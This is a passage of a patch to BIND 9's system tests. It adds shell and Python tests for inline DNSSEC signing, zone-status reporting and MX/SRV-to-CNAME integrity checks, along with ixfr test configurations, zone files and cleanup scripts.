ns3/removedkeys +# Ensure the wait_until_raw_zone_update_is_processed() call below will ignore +# log messages generated before the raw zone is updated. +nextpart ns3/named.run > /dev/null +# Add a record to the raw zone on the primary. +$NSUPDATE << EOF || ret=1 +zone removedkeys-primary. +server 10.53.0.3 ${PORT} +update add bar.removedkeys-primary. 0 A 127.0.0.1 +send +EOF +wait_until_raw_zone_update_is_processed "removedkeys-primary" +# Query for bar.removedkeys-primary/A again and ensure the signer still returns +# a negative, signed response. +$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-primary. A > dig.out.ns3.post.test$n 2>&1 +grep "status: NOERROR" dig.out.ns3.post.test$n > /dev/null && ret=1 +grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that backlogged changes to raw zone are applied after keys become available (primary) ($n)" +ret=0 +# Restore the signing keys for this zone. +mv ns3/removedkeys/Kremovedkeys-primary* ns3 +$RNDCCMD 10.53.0.3 loadkeys removedkeys-primary > /dev/null 2>&1 +# Determine what a SOA record with a bumped serial number should look like. +BUMPED_SOA=$(sed -n 's/.*\(add removedkeys-primary.*IN.*SOA\)/\1/p;' ns3/named.run | tail -1 | awk '{$8 += 1; print $0}') +# Ensure the wait_until_raw_zone_update_is_processed() call below will ignore +# log messages generated before the raw zone is updated. +nextpart ns3/named.run > /dev/null +# Bump the SOA serial number of the raw zone. +$NSUPDATE << EOF || ret=1 +zone removedkeys-primary. +server 10.53.0.3 ${PORT} +update del removedkeys-primary. SOA +update ${BUMPED_SOA} +send +EOF +wait_until_raw_zone_update_is_processed "removedkeys-primary" +# Query for bar.removedkeys-primary/A again and ensure the signer now returns a +# positive, signed response. +$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-primary. A > dig.out.ns3.test$n 2>&1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "RRSIG" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that changes to raw zone are not applied to a previously signed secure zone with no keys available (secondary) ($n)" +ret=0 +# Query for bar.removedkeys-secondary/A and ensure the response is negative. As this +# zone does have signing keys set up, the response must be signed. +$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-secondary. A > dig.out.ns3.pre.test$n 2>&1 || ret=1 +grep "status: NOERROR" dig.out.ns3.pre.test$n > /dev/null && ret=1 +grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null || ret=1 +# Remove the signing keys for this zone. +mv -f ns3/Kremovedkeys-secondary* ns3/removedkeys +# Ensure the wait_until_raw_zone_update_is_processed() call below will ignore +# log messages generated before the raw zone is updated. +nextpart ns3/named.run > /dev/null +# Add a record to the raw zone on the primary. +$NSUPDATE << EOF || ret=1 +zone removedkeys-secondary. +server 10.53.0.2 ${PORT} +update add bar.removedkeys-secondary. 0 A 127.0.0.1 +send +EOF +wait_until_raw_zone_update_is_processed "removedkeys-secondary" +# Query for bar.removedkeys-secondary/A again and ensure the signer still returns a +# negative, signed response. +$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-secondary. A > dig.out.ns3.post.test$n 2>&1 +grep "status: NOERROR" dig.out.ns3.post.test$n > /dev/null && ret=1 +grep "RRSIG" dig.out.ns3.pre.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that backlogged changes to raw zone are applied after keys become available (secondary) ($n)" +ret=0 +# Restore the signing keys for this zone. +mv ns3/removedkeys/Kremovedkeys-secondary* ns3 +$RNDCCMD 10.53.0.3 loadkeys removedkeys-secondary > /dev/null 2>&1 +# Determine what a SOA record with a bumped serial number should look like. +BUMPED_SOA=$(sed -n 's/.*\(add removedkeys-secondary.*IN.*SOA\)/\1/p;' ns2/named.run | tail -1 | awk '{$8 += 1; print $0}') +# Ensure the wait_until_raw_zone_update_is_processed() call below will ignore +# log messages generated before the raw zone is updated. +nextpart ns3/named.run > /dev/null +# Bump the SOA serial number of the raw zone on the primary. +$NSUPDATE << EOF || ret=1 +zone removedkeys-secondary. +server 10.53.0.2 ${PORT} +update del removedkeys-secondary. SOA +update ${BUMPED_SOA} +send +EOF +wait_until_raw_zone_update_is_processed "removedkeys-secondary" +# Query for bar.removedkeys-secondary/A again and ensure the signer now returns +# a positive, signed response. +$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-secondary. A > dig.out.ns3.test$n 2>&1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "RRSIG" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check that the file $2 for zone $1 does not contain RRSIG records +# while the journal file for that zone does contain them. +ensure_sigs_only_in_journal() { + origin="$1" + masterfile="$2" + $CHECKZONE -i none -f raw -D -o - "$origin" "$masterfile" 2>&1 | grep -w RRSIG > /dev/null && ret=1 + $CHECKZONE -j -i none -f raw -D -o - "$origin" "$masterfile" 2>&1 | grep -w RRSIG > /dev/null || ret=1 +} + +n=$((n + 1)) +echo_i "checking that records added from a journal are scheduled to be resigned ($n)" +ret=0 +# Signing keys for the "delayedkeys" zone are not yet accessible. Thus, the +# zone file for the signed version of the zone will contain no DNSSEC records. +# Move keys into place now and load them, which will cause DNSSEC records to +# only be present in the journal for the signed version of the zone. +mv Kdelayedkeys* ns3/ +$RNDCCMD 10.53.0.3 loadkeys delayedkeys > rndc.out.ns3.pre.test$n 2>&1 || ret=1 +# Wait until the zone is signed. +check_done_signing () ( + $RNDCCMD 10.53.0.3 signing -list delayedkeys > signing.out.test$n 2>&1 + num=$(grep "Done signing with" signing.out.test$n | wc -l) + [ $num -eq 2 ] +) +retry_quiet 10 check_done_signing || ret=1 +# Halt rather than stopping the server to prevent the file from being +# flushed upon shutdown since we specifically want to avoid it. +stop_server --use-rndc --halt --port ${CONTROLPORT} ns3 +ensure_sigs_only_in_journal delayedkeys ns3/delayedkeys.db.signed +start_server --noclean --restart --port ${PORT} ns3 +# At this point, the raw zone journal will not have a source serial set. Upon +# server startup, receive_secure_serial() will rectify that, update SOA, resign +# it, and schedule its future resign. This will cause "rndc zonestatus" to +# return delayedkeys/SOA as the next node to resign, so we restart the server +# once again; with the raw zone journal now having a source serial set, +# receive_secure_serial() should refrain from introducing any zone changes. +stop_server --use-rndc --halt --port ${CONTROLPORT} ns3 +ensure_sigs_only_in_journal delayedkeys ns3/delayedkeys.db.signed +nextpart ns3/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns3 +# We can now test whether the secure zone journal was correctly processed: +# unless the records contained in it were scheduled for resigning, no resigning +# event will be scheduled at all since the secure zone file contains no +# DNSSEC records. +wait_for_log 20 "all zones loaded" ns3/named.run || ret=1 +$RNDCCMD 10.53.0.3 zonestatus delayedkeys > rndc.out.ns3.post.test$n 2>&1 || ret=1 +grep "next resign node:" rndc.out.ns3.post.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check that zonestatus reports 'type: primary' for an inline primary zone ($n)" +ret=0 +$RNDCCMD 10.53.0.3 zonestatus master > rndc.out.ns3.test$n +grep "type: primary" rndc.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check that zonestatus reports 'type: secondary' for an inline secondary zone ($n)" +ret=0 +$RNDCCMD 10.53.0.3 zonestatus bits > rndc.out.ns3.test$n +grep "type: secondary" rndc.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking reload of touched inline zones ($n)" +ret=0 +echo_ic "pre-reload 'next key event'" +nextpart ns8/named.run > nextpart.pre$n.out +count=$(grep "zone example[0-9][0-9].com/IN (signed): next key event:" nextpart.pre$n.out | wc -l) +echo_ic "found: $count/16" +[ $count -eq 16 ] || ret=1 +echo_ic "touch and reload" +touch ns8/example??.com.db +$RNDCCMD 10.53.0.8 reload 2>&1 | sed 's/^/ns3 /' | cat_i +sleep 5 +echo_ic "post-reload 'next key event'" +nextpart ns8/named.run > nextpart.post$n.out +count=$(grep "zone example[0-9][0-9].com/IN (signed): next key event:" nextpart.post$n.out | wc -l) +echo_ic "found: $count/16" +[ $count -eq 16 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking second reload of touched inline zones ($n)" +ret=0 +nextpart ns8/named.run > nextpart.pre$n.out +$RNDCCMD 10.53.0.8 reload 2>&1 | sed 's/^/ns3 /' | cat_i +sleep 5 +nextpart ns8/named.run > nextpart.post$n.out +grep "ixfr-from-differences: unchanged" nextpart.post$n.out && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "Check that 'rndc reload' of just the serial updates the signed instance ($n)" +ret=0 +dig_with_opts @10.53.0.8 example SOA > dig.out.ns8.test$n.soa1 || ret=1 +cp ns8/example2.db.in ns8/example.db || ret=1 +nextpart ns8/named.run > /dev/null +rndccmd 10.53.0.8 reload || ret=1 +wait_for_log 3 "all zones loaded" ns8/named.run +sleep 1 +dig_with_opts @10.53.0.8 example SOA > dig.out.ns8.test$n.soa2 || ret=1 +soa1=$(awk '$4 == "SOA" { print $7 }' dig.out.ns8.test$n.soa1) +soa2=$(awk '$4 == "SOA" { print $7 }' dig.out.ns8.test$n.soa2) +ttl1=$(awk '$4 == "SOA" { print $2 }' dig.out.ns8.test$n.soa1) +ttl2=$(awk '$4 == "SOA" { print $2 }' dig.out.ns8.test$n.soa2) +test ${soa1:-1000} -lt ${soa2:-0} || ret=1 +test ${ttl1:-0} -eq 300 || ret=1 +test ${ttl2:-0} -eq 300 || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +n=$((n+1)) +echo_i "Check that restart with zone changes and deleted journal works ($n)" +TSIG= +ret=0 +dig_with_opts @10.53.0.8 example SOA > dig.out.ns8.test$n.soa1 || ret=1 +stop_server --use-rndc --port ${CONTROLPORT} ns8 +# TTL of all records change from 300 to 400 +cp ns8/example3.db.in ns8/example.db || ret=1 +rm ns8/example.db.jnl +nextpart ns8/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns8 +wait_for_log 3 "all zones loaded" ns8/named.run +sleep 1 +dig_with_opts @10.53.0.8 example SOA > dig.out.ns8.test$n.soa2 || ret=1 +soa1=$(awk '$4 == "SOA" { print $7 }' dig.out.ns8.test$n.soa1) +soa2=$(awk '$4 == "SOA" { print $7 }' dig.out.ns8.test$n.soa2) +ttl1=$(awk '$4 == "SOA" { print $2 }' dig.out.ns8.test$n.soa1) +ttl2=$(awk '$4 == "SOA" { print $2 }' dig.out.ns8.test$n.soa2) +test ${soa1:-1000} -lt ${soa2:-0} || ret=1 +test ${ttl1:-0} -eq 300 || ret=1 +test ${ttl2:-0} -eq 400 || ret=1 +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/inline/tests_signed_zone_files.py b/bin/tests/system/inline/tests_signed_zone_files.py new file mode 100755 index 0000000..596b756 --- /dev/null +++ b/bin/tests/system/inline/tests_signed_zone_files.py @@ -0,0 +1,67 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import glob +import struct + + +class RawFormatHeader(dict): + """ + A dictionary of raw-format header fields read from a zone file. + """ + + fields = [ + "format", + "version", + "dumptime", + "flags", + "sourceserial", + "lastxfrin", + ] + + def __init__(self, file_name): + header = struct.Struct(">IIIIII") + with open(file_name, "rb") as data: + header_data = data.read(header.size) + super().__init__(zip(self.fields, header.unpack_from(header_data))) + + +def test_unsigned_serial_number(): + """ + Check whether all signed zone files in the "ns8" subdirectory contain the + serial number of the unsigned version of the zone in the raw-format header. + The test assumes that all "*.signed" files in the "ns8" subdirectory are in + raw format. + + Notes: + + - The actual zone signing and dumping happens while the tests.sh phase of + the "inline" system test is set up and run. This check only verifies + the outcome of those events; it does not initiate any signing or + dumping itself. + + - example[0-9][0-9].com.db.signed files are initially signed by + dnssec-signzone while the others - by named. + """ + + zones_with_unsigned_serial_missing = [] + + for signed_zone in sorted(glob.glob("ns8/*.signed")): + raw_header = RawFormatHeader(signed_zone) + # Ensure the unsigned serial number is placed where it is expected. + assert raw_header["format"] == 2 + assert raw_header["version"] == 1 + # Check whether the header flags indicate that the unsigned serial + # number is set and that the latter is indeed set. + if raw_header["flags"] & 0x02 == 0 or raw_header["sourceserial"] == 0: + zones_with_unsigned_serial_missing.append(signed_zone) + + assert not zones_with_unsigned_serial_missing diff --git a/bin/tests/system/integrity/clean.sh b/bin/tests/system/integrity/clean.sh new file mode 100644 index 0000000..941fccf --- /dev/null +++ b/bin/tests/system/integrity/clean.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.test* +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/integrity/ns1/mx-cname.db b/bin/tests/system/integrity/ns1/mx-cname.db new file mode 100644 index 0000000..a700269 --- /dev/null +++ b/bin/tests/system/integrity/ns1/mx-cname.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns1 hostmaster 0 0 0 0 0 +@ NS ns1 +@ MX 0 cname +ns1 A 10.53.0.1 +cname CNAME ns1 diff --git a/bin/tests/system/integrity/ns1/named.conf.in b/bin/tests/system/integrity/ns1/named.conf.in new file mode 100644 index 0000000..4009c4f --- /dev/null +++ b/bin/tests/system/integrity/ns1/named.conf.in @@ -0,0 +1,114 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "mx-cname-fail" { + type primary; + check-integrity yes; + check-mx-cname fail; + file "mx-cname.db"; +}; + +zone "mx-cname-warn" { + type primary; + check-integrity yes; + check-mx-cname warn; + file "mx-cname.db"; +}; + +zone "mx-cname-ignore" { + type primary; + check-integrity yes; + check-mx-cname ignore; + file "mx-cname.db"; +}; + +zone "no-mx-cname-fail" { + type primary; + check-integrity no; + check-mx-cname fail; + file "mx-cname.db"; +}; + +zone "no-mx-cname-warn" { + type primary; + check-integrity no; + check-mx-cname warn; + file "mx-cname.db"; +}; + +zone "no-mx-cname-ignore" { + type primary; + check-integrity no; + check-mx-cname ignore; + file "mx-cname.db"; +}; + +zone "srv-cname-fail" { + type primary; + check-integrity yes; + check-srv-cname fail; + file "srv-cname.db"; +}; + +zone "srv-cname-warn" { + type primary; + check-integrity yes; + check-srv-cname warn; + file "srv-cname.db"; +}; + +zone "srv-cname-ignore" { + type primary; + check-integrity yes; + check-srv-cname ignore; + file "srv-cname.db"; +}; +zone "no-srv-cname-fail" { + type primary; + check-integrity no; + check-srv-cname fail; + file "srv-cname.db"; +}; + +zone "no-srv-cname-warn" { + type primary; + check-integrity no; + check-srv-cname warn; + file "srv-cname.db"; +}; + +zone "no-srv-cname-ignore" { + type primary; + check-integrity no; + check-srv-cname ignore; + file "srv-cname.db"; +}; diff --git a/bin/tests/system/integrity/ns1/srv-cname.db b/bin/tests/system/integrity/ns1/srv-cname.db new file mode 100644 index 0000000..d6ae603 --- /dev/null +++ b/bin/tests/system/integrity/ns1/srv-cname.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns1 hostmaster 0 0 0 0 0 +@ NS ns1 +@ SRV 0 0 0 cname +ns1 A 10.53.0.1 +cname CNAME ns1 diff --git a/bin/tests/system/integrity/setup.sh b/bin/tests/system/integrity/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/integrity/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/integrity/tests.sh b/bin/tests/system/integrity/tests.sh new file mode 100644 index 0000000..b69c3b4 --- /dev/null +++ b/bin/tests/system/integrity/tests.sh @@ -0,0 +1,131 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" + +status=0 +n=1 + +echo_i "check that 'check-integrity yes; check-mx-cname fail;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx mx-cname-fail > dig.out.test$n || ret=1 +grep "status: SERVFAIL," dig.out.test$n > /dev/null || ret=1 +grep "zone mx-cname-fail/IN: mx-cname-fail/MX 'cname.mx-cname-fail' is a CNAME (illegal)" ns1/named.run > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity yes; check-mx-cname warn;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx mx-cname-warn > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone mx-cname-warn/IN: mx-cname-warn/MX 'cname.mx-cname-warn' is a CNAME (illegal)" ns1/named.run > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity yes; check-mx-cname ignore;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx mx-cname-ignore > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone mx-cname-ignore/IN: mx-cname-ignore/MX 'cname.mx-cname-ignore' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-mx-cname fail;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx no-mx-cname-fail > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-mx-cname-fail/IN: no-mx-cname-fail/MX 'cname.no-mx-cname-fail' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-mx-cname warn;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx no-mx-cname-warn > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-mx-cname-warn/IN: no-mx-cname-warn/MX 'cname.no-mx-cname-warn' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-mx-cname ignore;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx no-mx-cname-ignore > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-mx-cname-ignore/IN: no-mx-cname-ignore/MX 'cname.no-mx-cname-ignore' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity yes; check-srv-cname fail;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv srv-cname-fail > dig.out.test$n || ret=1 +grep "status: SERVFAIL," dig.out.test$n > /dev/null || ret=1 +grep "zone srv-cname-fail/IN: srv-cname-fail/SRV 'cname.srv-cname-fail' is a CNAME (illegal)" ns1/named.run > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity yes; check-srv-cname warn;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv srv-cname-warn > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone srv-cname-warn/IN: srv-cname-warn/SRV 'cname.srv-cname-warn' is a CNAME (illegal)" ns1/named.run > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity yes; check-srv-cname ignore;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv srv-cname-ignore > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone srv-cname-ignore/IN: srv-cname-ignore/SRV 'cname.srv-cname-ignore' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-srv-cname fail;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv no-srv-cname-fail > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-srv-cname-fail/IN: no-srv-cname-fail/SRV 'cname.no-srv-cname-fail' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-srv-cname warn;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv no-srv-cname-warn > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-srv-cname-warn/IN: no-srv-cname-warn/SRV 'cname.no-srv-cname-warn' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-srv-cname ignore;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv no-srv-cname-ignore > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-srv-cname-ignore/IN: no-srv-cname-ignore/SRV 'cname.no-srv-cname-ignore' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +test $status -eq 0 || exit 1 diff --git a/bin/tests/system/ixfr/ans2/startme b/bin/tests/system/ixfr/ans2/startme new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/bin/tests/system/ixfr/ans2/startme diff --git a/bin/tests/system/ixfr/clean.sh b/bin/tests/system/ixfr/clean.sh new file mode 100644 index 0000000..eb78363 --- /dev/null +++ b/bin/tests/system/ixfr/clean.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f stats.* +rm -f ns1/*.db ns1/*.jnl +rm -f ns3/*.jnl ns3/mytest*.db ns3/subtest*.db +rm -f ns4/*.jnl ns4/*.db +rm -f ns5/*.jnl ns5/*.db +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run */named.run.prev +rm -f */ans.run +rm -f dig.out.test* dig.out1.test* dig.out2.test* dig.out3.test* +rm -f ns3/large.db +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* ns*/*.mkeys diff --git a/bin/tests/system/ixfr/ixfr-stats.good b/bin/tests/system/ixfr/ixfr-stats.good new file mode 100644 index 0000000..3d0d2dd --- /dev/null +++ b/bin/tests/system/ixfr/ixfr-stats.good @@ -0,0 +1,3 @@ +messages=1 +records=5 +bytes=204 diff --git a/bin/tests/system/ixfr/ns1/named.conf.in b/bin/tests/system/ixfr/ns1/named.conf.in new file mode 100644 index 0000000..497e255 --- /dev/null +++ b/bin/tests/system/ixfr/ns1/named.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/ixfr/ns1/startme b/bin/tests/system/ixfr/ns1/startme new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/bin/tests/system/ixfr/ns1/startme diff --git a/bin/tests/system/ixfr/ns3/named.conf.in b/bin/tests/system/ixfr/ns3/named.conf.in new file mode 100644 index 0000000..3ff936e --- /dev/null +++ b/bin/tests/system/ixfr/ns3/named.conf.in @@ -0,0 +1,52 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + allow-transfer { any; }; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view "primary" { + ixfr-from-differences yes; + request-ixfr yes; + zone "test" IN { + type primary; + file "mytest.db"; + max-ixfr-ratio 75%; + }; + zone "sub.test" IN { + type primary; + file "subtest.db"; + }; + zone "large" IN { + type primary; + file "large.db"; + }; +}; diff --git a/bin/tests/system/ixfr/ns4/named.conf.in b/bin/tests/system/ixfr/ns4/named.conf.in new file mode 100644 index 0000000..934cbb6 --- /dev/null +++ b/bin/tests/system/ixfr/ns4/named.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; 